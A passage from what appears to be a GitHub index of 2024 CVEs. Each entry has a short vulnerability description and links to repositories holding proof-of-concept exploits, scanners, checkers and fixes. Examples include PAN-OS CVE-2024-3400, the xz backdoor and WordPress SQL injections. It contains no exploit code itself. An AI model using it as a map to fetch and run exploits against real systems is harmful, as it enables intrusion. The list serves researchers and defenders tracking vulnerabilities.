NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely.
- [passer12/CVE-2024-1931-reproduction](https://github.com/passer12/CVE-2024-1931-reproduction)
### CVE-2024-1939 (2024-02-29)
Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
- [rycbar77/CVE-2024-1939](https://github.com/rycbar77/CVE-2024-1939)
### CVE-2024-2054 (2024-03-05)
The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.
- [Madan301/CVE-2024-2054](https://github.com/Madan301/CVE-2024-2054)
### CVE-2024-2074 (2024-03-01)
Eine kritische Schwachstelle wurde in Mini-Tmall bis 20231017 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei ?r=tmall/admin/user/1/1. Mit der Manipulation des Arguments orderBy mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [yuziiiiiiiiii/CVE-2024-2074](https://github.com/yuziiiiiiiiii/CVE-2024-2074)
### CVE-2024-2169 (2024-03-19)
Implementations of UDP application protocol are vulnerable to network loops. An unauthenticated attacker can use maliciously-crafted packets against a vulnerable implementation that can lead to Denial of Service (DOS) and/or abuse of resources.
- [douglasbuzatto/G3-Loop-DoS](https://github.com/douglasbuzatto/G3-Loop-DoS)
### CVE-2024-2188 (2024-03-05)
Cross-Site Scripting (XSS) vulnerability stored in TP-Link Archer AX50 affecting firmware version 1.0.11 build 2022052. This vulnerability could allow an unauthenticated attacker to create a port mapping rule via a SOAP request and store a malicious JavaScript payload within that rule, which could result in an execution of the JavaScript payload when the rule is loaded.
- [hacefresko/CVE-2024-2188](https://github.com/hacefresko/CVE-2024-2188)
### CVE-2024-2193 (2024-03-15)
A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths.
- [uthrasri/CVE-2024-2193](https://github.com/uthrasri/CVE-2024-2193)
### CVE-2024-2257 (2024-05-10)
This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to improper implementation of password policies. An attacker with physical access could exploit this by creating password that do not adhere to the defined security standards/policy on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to expose the router to potential security threats.
- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257)
### CVE-2024-2389 (2024-04-02)
In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n\n
- [adhikara13/CVE-2024-2389](https://github.com/adhikara13/CVE-2024-2389)
### CVE-2024-2432 (2024-03-13)
A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.
- [Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP](https://github.com/Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP)
### CVE-2024-2667 (2024-05-02)
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
- [Puvipavan/CVE-2024-2667](https://github.com/Puvipavan/CVE-2024-2667)
### CVE-2024-2876 (2024-05-02)
The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [c0d3zilla/CVE-2024-2876](https://github.com/c0d3zilla/CVE-2024-2876)
- [Quantum-Hacker/CVE-2024-2876](https://github.com/Quantum-Hacker/CVE-2024-2876)
- [0xAgun/CVE-2024-2876](https://github.com/0xAgun/CVE-2024-2876)
- [skyrowalker/CVE-2024-2876](https://github.com/skyrowalker/CVE-2024-2876)
### CVE-2024-2879 (2024-04-03)
The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [herculeszxc/CVE-2024-2879](https://github.com/herculeszxc/CVE-2024-2879)
### CVE-2024-2887 (2024-03-26)
Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)
- [PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC](https://github.com/PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC)
- [rycbar77/CVE-2024-2887](https://github.com/rycbar77/CVE-2024-2887)
### CVE-2024-2961 (2024-04-17)
The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.\n
- [mattaperkins/FIX-CVE-2024-2961](https://github.com/mattaperkins/FIX-CVE-2024-2961)
- [rvizx/CVE-2024-2961](https://github.com/rvizx/CVE-2024-2961)
- [ambionics/cnext-exploits](https://github.com/ambionics/cnext-exploits)
- [absolutedesignltd/iconvfix](https://github.com/absolutedesignltd/iconvfix)
- [exfil0/test_iconv](https://github.com/exfil0/test_iconv)
- [tnishiox/cve-2024-2961](https://github.com/tnishiox/cve-2024-2961)
- [kjdfklha/CVE-2024-2961_poc](https://github.com/kjdfklha/CVE-2024-2961_poc)
### CVE-2024-2997 (2024-03-27)
In Bdtask Multi-Store Inventory Management System bis 20240320 wurde eine problematische Schwachstelle ausgemacht. Hierbei betrifft es unbekannten Programmcode. Durch das Manipulieren des Arguments Category Name/Model Name/Brand Name/Unit Name mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [lfillaz/CVE-2024-2997](https://github.com/lfillaz/CVE-2024-2997)
### CVE-2024-3094 (2024-03-29)
Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. \r\nThrough a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.
- [byinarie/CVE-2024-3094-info](https://github.com/byinarie/CVE-2024-3094-info)
- [FabioBaroni/CVE-2024-3094-checker](https://github.com/FabioBaroni/CVE-2024-3094-checker)
- [lypd0/CVE-2024-3094-Vulnerabity-Checker](https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker)
- [OpensourceICTSolutions/xz_utils-CVE-2024-3094](https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094)
- [bioless/xz_cve-2024-3094_detection](https://github.com/bioless/xz_cve-2024-3094_detection)
- [Hacker-Hermanos/CVE-2024-3094_xz_check](https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check)
- [Fractal-Tess/CVE-2024-3094](https://github.com/Fractal-Tess/CVE-2024-3094)
- [wgetnz/CVE-2024-3094-check](https://github.com/wgetnz/CVE-2024-3094-check)
- [emirkmo/xz-backdoor-github](https://github.com/emirkmo/xz-backdoor-github)
- [ashwani95/CVE-2024-3094](https://github.com/ashwani95/CVE-2024-3094)
- [harekrishnarai/xz-utils-vuln-checker](https://github.com/harekrishnarai/xz-utils-vuln-checker)
- [teyhouse/CVE-2024-3094](https://github.com/teyhouse/CVE-2024-3094)
- [alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer](https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer)
- [Horizon-Software-Development/CVE-2024-3094](https://github.com/Horizon-Software-Development/CVE-2024-3094)
- [hazemkya/CVE-2024-3094-checker](https://github.com/hazemkya/CVE-2024-3094-checker)
- [lockness-Ko/xz-vulnerable-honeypot](https://github.com/lockness-Ko/xz-vulnerable-honeypot)
- [brinhosa/CVE-2024-3094-One-Liner](https://github.com/brinhosa/CVE-2024-3094-One-Liner)
- [isuruwa/CVE-2024-3094](https://github.com/isuruwa/CVE-2024-3094)
- [Yuma-Tsushima07/CVE-2024-3094](https://github.com/Yuma-Tsushima07/CVE-2024-3094)
- [jfrog/cve-2024-3094-tools](https://github.com/jfrog/cve-2024-3094-tools)
- [Simplifi-ED/CVE-2024-3094-patcher](https://github.com/Simplifi-ED/CVE-2024-3094-patcher)
- [gayatriracha/CVE-2024-3094-Nmap-NSE-script](https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script)
- [Mustafa1986/CVE-2024-3094](https://github.com/Mustafa1986/CVE-2024-3094)
- [MrBUGLF/XZ-Utils_CVE-2024-3094](https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094)
- [galacticquest/cve-2024-3094-detect](https://github.com/galacticquest/cve-2024-3094-detect)
- [zgimszhd61/cve-2024-3094-detect-tool](https://github.com/zgimszhd61/cve-2024-3094-detect-tool)
- [mightysai1997/CVE-2024-3094-info](https://github.com/mightysai1997/CVE-2024-3094-info)
- [mightysai1997/CVE-2024-3094](https://github.com/mightysai1997/CVE-2024-3094)
- [mesutgungor/xz-backdoor-vulnerability](https://github.com/mesutgungor/xz-backdoor-vulnerability)
- [reuteras/CVE-2024-3094](https://github.com/reuteras/CVE-2024-3094)
- [amlweems/xzbot](https://github.com/amlweems/xzbot)
- [gustavorobertux/CVE-2024-3094](https://github.com/gustavorobertux/CVE-2024-3094)
- [ackemed/detectar_cve-2024-3094](https://github.com/ackemed/detectar_cve-2024-3094)
- [0xlane/xz-cve-2024-3094](https://github.com/0xlane/xz-cve-2024-3094)
- [dah4k/CVE-2024-3094](https://github.com/dah4k/CVE-2024-3094)
- [hackingetico21/revisaxzutils](https://github.com/hackingetico21/revisaxzutils)
- [devjanger/CVE-2024-3094-XZ-Backdoor-Detector](https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector)
- [ScrimForever/CVE-2024-3094](https://github.com/ScrimForever/CVE-2024-3094)
- [pentestfunctions/CVE-2024-3094](https://github.com/pentestfunctions/CVE-2024-3094)
- [r0binak/xzk8s](https://github.com/r0binak/xzk8s)
- [przemoc/xz-backdoor-links](https://github.com/przemoc/xz-backdoor-links)
- [CyberGuard-Foundation/CVE-2024-3094](https://github.com/CyberGuard-Foundation/CVE-2024-3094)
- [Security-Phoenix-demo/CVE-2024-3094-fix-exploits](https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits)
- [MagpieRYL/CVE-2024-3094-backdoor-env-container](https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container)
- [Bella-Bc/xz-backdoor-CVE-2024-3094-Check](https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check)
- [TheTorjanCaptain/CVE-2024-3094-Checker](https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker)
- [iheb2b/CVE-2024-3094-Checker](https://github.com/iheb2b/CVE-2024-3094-Checker)
- [felipecosta09/cve-2024-3094](https://github.com/felipecosta09/cve-2024-3094)
- [weltregie/liblzma-scan](https://github.com/weltregie/liblzma-scan)
- [crfearnworks/ansible-CVE-2024-3094](https://github.com/crfearnworks/ansible-CVE-2024-3094)
- [robertdebock/ansible-playbook-cve-2024-3094](https://github.com/robertdebock/ansible-playbook-cve-2024-3094)
- [badsectorlabs/ludus_xz_backdoor](https://github.com/badsectorlabs/ludus_xz_backdoor)
- [Juul/xz-backdoor-scan](https://github.com/Juul/xz-backdoor-scan)
- [fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-](https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-)
- [neuralinhibitor/xzwhy](https://github.com/neuralinhibitor/xzwhy)
- [AndreaCicca/Sicurezza-Informatica-Presentazione](https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione)
- [shefirot/CVE-2024-3094](https://github.com/shefirot/CVE-2024-3094)
- [DANO-AMP/CVE-2024-3094](https://github.com/DANO-AMP/CVE-2024-3094)
- [robertdfrench/ifuncd-up](https://github.com/robertdfrench/ifuncd-up)
### CVE-2024-3105 (2024-06-15)
The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server.
- [hunThubSpace/CVE-2024-3105-PoC](https://github.com/hunThubSpace/CVE-2024-3105-PoC)
### CVE-2024-3116 (2024-04-04)
pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.\n
- [TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4](https://github.com/TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4)
### CVE-2024-3177 (2024-04-22)
A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the kubernetes.io/enforce-mountable-secrets annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated.
- [Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM)
### CVE-2024-3183 (2024-06-12)
A vulnerability was found in FreeIPA in a way when a Kerberos TGS-REQ is encrypted using the client’s session key. This key is different for each new session, which protects it from brute force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user’s password.\r\n\r\nIf a principal is compromised it means the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute force attacks to find character strings able to decrypt tickets when combined to a principal salt (i.e. find the principal’s password).
- [Cyxow/CVE-2024-3183-POC](https://github.com/Cyxow/CVE-2024-3183-POC)
### CVE-2024-3217 (2024-04-05)
The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'attribute_value' and 'attribute_id' parameters in all versions up to, and including, 1.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [BassamAssiri/CVE-2024-3217-POC](https://github.com/BassamAssiri/CVE-2024-3217-POC)
### CVE-2024-3272 (2024-04-04)
Eine Schwachstelle wurde in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 entdeckt. Sie wurde als sehr kritisch eingestuft. Betroffen davon ist ein unbekannter Prozess der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Mit der Manipulation des Arguments user mit der Eingabe messagebus mit unbekannten Daten kann eine hard-coded credentials-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [nickswink/D-Link-NAS-Devices-Unauthenticated-RCE](https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE)
- [aliask/dinkleberry](https://github.com/aliask/dinkleberry)
### CVE-2024-3273 (2024-04-04)
Es wurde eine Schwachstelle in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 gefunden. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Durch die Manipulation des Arguments system mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [Chocapikk/CVE-2024-3273](https://github.com/Chocapikk/CVE-2024-3273)
- [adhikara13/CVE-2024-3273](https://github.com/adhikara13/CVE-2024-3273)
- [yarienkiva/honeypot-dlink-CVE-2024-3273](https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273)
- [K3ysTr0K3R/CVE-2024-3273-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT)
- [ThatNotEasy/CVE-2024-3273](https://github.com/ThatNotEasy/CVE-2024-3273)
- [LeopoldSkell/CVE-2024-3273](https://github.com/LeopoldSkell/CVE-2024-3273)
- [mrrobot0o/CVE-2024-3273-](https://github.com/mrrobot0o/CVE-2024-3273-)
- [OIivr/Turvan6rkus-CVE-2024-3273](https://github.com/OIivr/Turvan6rkus-CVE-2024-3273)
- [X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE](https://github.com/X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE)
### CVE-2024-3293 (2024-04-23)
The rtMedia for WordPress, BuddyPress and bbPress plugin for WordPress is vulnerable to blind SQL Injection via the rtmedia_gallery shortcode in all versions up to, and including, 4.6.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [truonghuuphuc/CVE-2024-3293-Poc](https://github.com/truonghuuphuc/CVE-2024-3293-Poc)
### CVE-2024-3400 (2024-04-12)
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.\n\nCloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
- [Yuvvi01/CVE-2024-3400](https://github.com/Yuvvi01/CVE-2024-3400)
- [CerTusHack/CVE-2024-3400-PoC](https://github.com/CerTusHack/CVE-2024-3400-PoC)
- [0x0d3ad/CVE-2024-3400](https://github.com/0x0d3ad/CVE-2024-3400)
- [FoxyProxys/CVE-2024-3400](https://github.com/FoxyProxys/CVE-2024-3400)
- [momika233/CVE-2024-3400](https://github.com/momika233/CVE-2024-3400)
- [MrR0b0t19/CVE-2024-3400](https://github.com/MrR0b0t19/CVE-2024-3400)
- [MurrayR0123/CVE-2024-3400-Compromise-Checker](https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker)
- [AdaniKamal/CVE-2024-3400](https://github.com/AdaniKamal/CVE-2024-3400)
- [LoanVitor/CVE-2024-3400-](https://github.com/LoanVitor/CVE-2024-3400-)
- [h4x0r-dz/CVE-2024-3400](https://github.com/h4x0r-dz/CVE-2024-3400)
- [W01fh4cker/CVE-2024-3400-RCE-Scan](https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan)
- [CONDITIONBLACK/CVE-2024-3400-POC](https://github.com/CONDITIONBLACK/CVE-2024-3400-POC)
- [Chocapikk/CVE-2024-3400](https://github.com/Chocapikk/CVE-2024-3400)
- [ihebski/CVE-2024-3400](https://github.com/ihebski/CVE-2024-3400)
- [index2014/CVE-2024-3400-Checker](https://github.com/index2014/CVE-2024-3400-Checker)
- [ZephrFish/CVE-2024-3400-Canary](https://github.com/ZephrFish/CVE-2024-3400-Canary)
- [ak1t4/CVE-2024-3400](https://github.com/ak1t4/CVE-2024-3400)
- [retkoussa/CVE-2024-3400](https://github.com/retkoussa/CVE-2024-3400)
- [schooldropout1337/CVE-2024-3400](https://github.com/schooldropout1337/CVE-2024-3400)
- [hahasagined/CVE-2024-3400](https://github.com/hahasagined/CVE-2024-3400)
- [codeblueprint/CVE-2024-3400](https://github.com/codeblueprint/CVE-2024-3400)
- [swaybs/CVE-2024-3400](https://github.com/swaybs/CVE-2024-3400)
- [sxyrxyy/CVE-2024-3400-Check](https://github.com/sxyrxyy/CVE-2024-3400-Check)
- [Ravaan21/CVE-2024-3400](https://github.com/Ravaan21/CVE-2024-3400)
- [tfrederick74656/cve-2024-3400-poc](https://github.com/tfrederick74656/cve-2024-3400-poc)
- [pwnj0hn/CVE-2024-3400](https://github.com/pwnj0hn/CVE-2024-3400)
- [HackingLZ/panrapidcheck](https://github.com/HackingLZ/panrapidcheck)
- [Kr0ff/cve-2024-3400](https://github.com/Kr0ff/cve-2024-3400)
- [zam89/CVE-2024-3400-pot](https://github.com/zam89/CVE-2024-3400-pot)
- [terminalJunki3/CVE-2024-3400-Checker](https://github.com/terminalJunki3/CVE-2024-3400-Checker)
- [0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection](https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection)
- [marconesler/CVE-2024-3400](https://github.com/marconesler/CVE-2024-3400)
- [andrelia-hacks/CVE-2024-3400](https://github.com/andrelia-hacks/CVE-2024-3400)
- [tk-sawada/IPLineFinder](https://github.com/tk-sawada/IPLineFinder)
- [iwallarm/cve-2024-3400](https://github.com/iwallarm/cve-2024-3400)
### CVE-2024-3435 (2024-05-16)
A path traversal vulnerability exists in the 'save_settings' endpoint of the parisneo/lollms-webui application, affecting versions up to the latest release before 9.5. The vulnerability arises due to insufficient sanitization of the 'config' parameter in the 'apply_settings' function, allowing an attacker to manipulate the application's configuration by sending specially crafted JSON payloads. This could lead to remote code execution (RCE) by bypassing existing patches designed to mitigate such vulnerabilities.
- [ymuraki-csc/cve-2024-3435](https://github.com/ymuraki-csc/cve-2024-3435)
### CVE-2024-3495 (2024-05-22)
The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [truonghuuphuc/CVE-2024-3495-Poc](https://github.com/truonghuuphuc/CVE-2024-3495-Poc)
- [zomasec/CVE-2024-3495-POC](https://github.com/zomasec/CVE-2024-3495-POC)
### CVE-2024-3552 (2024-06-13)
The Web Directory Free WordPress plugin before 1.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
- [truonghuuphuc/CVE-2024-3552-Poc](https://github.com/truonghuuphuc/CVE-2024-3552-Poc)
### CVE-2024-3596 (2024-07-09)
RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.
- [alperenugurlu/CVE-2024-3596-Detector](https://github.com/alperenugurlu/CVE-2024-3596-Detector)
### CVE-2024-3656
- [h4x0r-dz/CVE-2024-3656](https://github.com/h4x0r-dz/CVE-2024-3656)
### CVE-2024-3806 (2024-05-09)
The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.
- [truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc](https://github.com/truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc)
### CVE-2024-3867 (2024-04-16)
The archive-tainacan-collection theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in version 2.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
- [c4cnm/CVE-2024-3867](https://github.com/c4cnm/CVE-2024-3867)
### CVE-2024-3922 (2024-06-13)
The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [truonghuuphuc/CVE-2024-3922-Poc](https://github.com/truonghuuphuc/CVE-2024-3922-Poc)
### CVE-2024-4040 (2024-04-22)
A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.\n
- [airbus-cert/CVE-2024-4040](https://github.com/airbus-cert/CVE-2024-4040)
- [tucommenceapousser/CVE-2024-4040-Scanner](https://github.com/tucommenceapousser/CVE-2024-4040-Scanner)
- [rbih-boulanouar/CVE-2024-4040](https://github.com/rbih-boulanouar/CVE-2024-4040)
- [Mufti22/CVE-2024-4040](https://github.com/Mufti22/CVE-2024-4040)
- [Stuub/CVE-2024-4040-SSTI-LFI-PoC](https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC)
- [0xN7y/CVE-2024-4040](https://github.com/0xN7y/CVE-2024-4040)
- [Praison001/CVE-2024-4040-CrushFTP-server](https://github.com/Praison001/CVE-2024-4040-CrushFTP-server)
- [Mohammaddvd/CVE-2024-4040](https://github.com/Mohammaddvd/CVE-2024-4040)
- [jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability](https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability)
- [gotr00t0day/CVE-2024-4040](https://github.com/gotr00t0day/CVE-2024-4040)
- [1ncendium/CVE-2024-4040](https://github.com/1ncendium/CVE-2024-4040)
- [olebris/CVE-2024-4040](https://github.com/olebris/CVE-2024-4040)
- [entroychang/CVE-2024-4040](https://github.com/entroychang/CVE-2024-4040)
- [safeer-accuknox/CrushFTP-cve-2024-4040-poc](https://github.com/safeer-accuknox/CrushFTP-cve-2024-4040-poc)
- [geniuszlyy/GenCrushSSTIExploit](https://github.com/geniuszlyy/GenCrushSSTIExploit)
- [rahisec/CVE-2024-4040](https://github.com/rahisec/CVE-2024-4040)
### CVE-2024-4231 (2024-05-10)
This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by identifying UART pins and accessing the root shell on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to access the sensitive information on the targeted system.
- [Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231)
### CVE-2024-4232 (2024-05-10)
This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to lack of encryption or hashing in storing of passwords within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext passwords on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.
- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232)
- [Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232)
### CVE-2024-4295 (2024-06-05)
The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the ‘hash’ parameter in all versions up to, and including, 5.7.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [truonghuuphuc/CVE-2024-4295-Poc](https://github.com/truonghuuphuc/CVE-2024-4295-Poc)
- [cve-2024/CVE-2024-4295-Poc](https://github.com/cve-2024/CVE-2024-4295-Poc)
### CVE-2024-4320 (2024-06-06)
A remote code execution (RCE) vulnerability exists in the '/install_extension' endpoint of the parisneo/lollms-webui application, specifically within the `@router.post("/install_extension")` route handler. The vulnerability arises due to improper handling of the `name` parameter in the `ExtensionBuilder().build_extension()` method, which allows for local file inclusion (LFI) leading to arbitrary code execution. An attacker can exploit this vulnerability by crafting a malicious `name` parameter that causes the server to load and execute a `__init__.py` file from an arbitrary location, such as the upload directory for discussions. This vulnerability affects the latest version of parisneo/lollms-webui and can lead to remote code execution without requiring user interaction, especially when the application is exposed to an external endpoint or operated in headless mode.
- [bolkv/CVE-2024-4320](https://github.com/bolkv/CVE-2024-4320)
### CVE-2024-4323 (2024-05-20)
